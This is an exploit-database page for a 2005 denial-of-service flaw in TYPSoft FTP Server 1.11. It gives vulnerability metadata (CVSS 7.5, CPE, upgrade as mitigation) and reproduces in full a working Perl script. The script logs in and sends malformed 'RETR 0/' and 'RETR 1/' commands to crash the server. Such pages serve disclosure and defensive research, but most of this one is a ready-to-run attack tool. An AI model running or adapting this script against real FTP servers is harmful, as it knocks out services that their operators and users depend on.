TYPSoft FTP Server - exploit.company

vendor:

FTP Server

by:

wood (at) Exploitlabs.com

7.5

CVSS

HIGH

Denial of Service (DoS)

400

CWE

Product Name: FTP Server

Affected Version From: 1.11

Affected Version To: 1.11

Patch Exists: YES

Related CWE: N/A

CPE: a:typsoft:ftp_server:1.11

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2005

TYPSoft FTP Server <= v1.11 DOS

This exploit is used to cause a denial of service (DoS) on TYPSoft FTP Server version 1.11. It sends two error codes, RETR 0 and RETR 1, to the server which causes it to crash.

Mitigation:

Upgrade to the latest version of TYPSoft FTP Server.

Source

Exploit-DB raw data:

#!/usr/bin/perl

use IO::Socket;
use Socket;

print "\n-= TYPSoft FTP Server <= v1.11 DOS =-\n";
print "-= wood (at) Exploitlabs.com =-\n\n";

if($#ARGV < 2 | $#ARGV > 3) { die "usage: perl typsoft-1.11-DOS.pl <host> <user> <pass> [port]\n" };
if($#ARGV > 2) { $prt = $ARGV[3] } else { $prt = "21" };

$adr = $ARGV[0];
$usr = $ARGV[1];
$pas = $ARGV[2];
$err1 = "RETR 0";
$err2 = "RETR 1";


$remote = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$adr,
PeerPort=>$prt, Reuse=>1) or die "Error: cant connect to $adr:$prt\n";

$remote->autoflush(1);

print $remote "USER $usr\n" and print "1. Sending : USER $usr...\n" or die
"Error: cant send user\n";

print $remote "PASS $pas\n" and print "2. Sending : PASS $pas...\n" or die
"Error: cant send pass\n";

print $remote "$err1/\n" and print "3. Sending : ErrorCode 1...\n";
print $remote "$err2/\n" and print "4. Sending : ErrorCode 2...\n\n"or die 
"Error: cant send error code\n";

print "Attack done. press any key to exit\n";
$bla= <STDIN>;
close $remote; 

# milw0rm.com [2005-10-14]